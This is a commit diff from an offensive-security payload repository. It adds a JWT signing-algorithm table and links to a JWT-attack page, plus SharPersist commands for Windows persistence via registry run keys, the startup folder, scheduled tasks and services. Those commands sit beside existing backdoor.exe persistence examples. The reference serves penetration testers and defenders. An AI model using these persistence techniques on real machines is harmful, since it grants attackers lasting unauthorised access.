mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings
synced 2024-06-28 18:03:14 +00:00
SharpPersist - Windows Persistence
This commit is contained in:
Swissky
parent
5455c30ec7
commit
742e3204d3
@ -46,6 +46,24 @@ Default algorithm is "HS256" (HMAC SHA256 symmetric encryption).
|
||||
}
|
||||
```
|
||||
|
||||
| `alg` Param Value | Digital Signature or MAC Algorithm | Requirements |
|
||||
|---|---|---|
|
||||
| HS256 | HMAC using SHA-256 | Required |
|
||||
| HS384 | HMAC using SHA-384 | Optional |
|
||||
| HS512 | HMAC using SHA-512 | Optional |
|
||||
| RS256 | RSASSA-PKCS1-v1_5 using SHA-256 | Recommended |
|
||||
| RS384 | RSASSA-PKCS1-v1_5 using SHA-384 | Optional |
|
||||
| RS512 | RSASSA-PKCS1-v1_5 using SHA-512 | Optional |
|
||||
| ES256 | ECDSA using P-256 and SHA-256 | Recommended |
|
||||
| ES384 | ECDSA using P-384 and SHA-384 | Optional |
|
||||
| ES512 | ECDSA using P-521 and SHA-512 | Optional |
|
||||
| PS256 | RSASSA-PSS using SHA-256 and MGF1 with SHA-256 | Optional |
|
||||
| PS384 | RSASSA-PSS using SHA-384 and MGF1 with SHA-384 | Optional |
|
||||
| PS512 | RSASSA-PSS using SHA-512 and MGF1 with SHA-512 | Optional |
|
||||
| none | No digital signature or MAC performed | Required |
|
||||
|
||||
|
||||
|
||||
### Payload
|
||||
|
||||
```json
|
||||
@ -271,4 +289,5 @@ eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMj...Fh7HgQ:secret
|
||||
- [Attacking JWT authentication - Sep 28, 2016 - Sjoerd Langkemper](https://www.sjoerdlangkemper.nl/2016/09/28/attacking-jwt-authentication/)
|
||||
- [How to Hack a Weak JWT Implementation with a Timing Attack - Jan 7, 2017 - Tamas Polgar](https://hackernoon.com/can-timing-attack-be-a-practical-security-threat-on-jwt-signature-ba3c8340dea9)
|
||||
- [HACKING JSON WEB TOKENS, FROM ZERO TO HERO WITHOUT EFFORT - Thu Feb 09 2017 - @pdp](https://blog.websecurify.com/2017/02/hacking-json-web-tokens.html)
|
||||
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
|
||||
- [Write up – JRR Token – LeHack 2019 - 07/07/2019 - LAPHAZE](http://rootinthemiddle.org/write-up-jrr-token-lehack-2019/)
|
||||
- [JWT Hacking 101 - TrustFoundry - Tyler Rosonke - December 8th, 2017](https://trustfoundry.net/jwt-hacking-101/)
|
||||
@ -2,6 +2,7 @@
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Userland](#userland)
|
||||
* [Registry](#registry)
|
||||
* [Startup](#startup)
|
||||
@ -13,6 +14,10 @@
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
|
||||
|
||||
## Userland
|
||||
|
||||
### Registry
|
||||
@ -24,6 +29,14 @@ Value name: Backdoor
|
||||
Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
||||
```
|
||||
|
||||
Using SharPersist
|
||||
|
||||
```powershell
|
||||
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
|
||||
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
|
||||
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add
|
||||
```
|
||||
|
||||
### Startup
|
||||
|
||||
Create a batch script in the user startup folder.
|
||||
@ -33,6 +46,12 @@ PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
|
||||
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
|
||||
```
|
||||
|
||||
Using SharPersist
|
||||
|
||||
```powershell
|
||||
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
|
||||
```
|
||||
|
||||
### Scheduled Task
|
||||
|
||||
```powershell
|
||||
@ -44,6 +63,25 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
|
||||
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||
```
|
||||
|
||||
Using SharPersist
|
||||
|
||||
```powershell
|
||||
# Add to a current scheduled task
|
||||
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
|
||||
|
||||
# Add new task
|
||||
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
|
||||
SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
|
||||
```
|
||||
|
||||
## Windows Service
|
||||
|
||||
Using SharPersist
|
||||
|
||||
```powershell
|
||||
SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
|
||||
```
|
||||
|
||||
## Elevated
|
||||
|
||||
### HKLM
|
||||
@ -79,4 +117,5 @@ PS C:\> Register-ScheduledTask Backdoor -InputObject $D
|
||||
## References
|
||||
|
||||
* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
|
||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
||||
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
|
||||
* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
|
||||
Loading…
Reference in New Issue
Block a user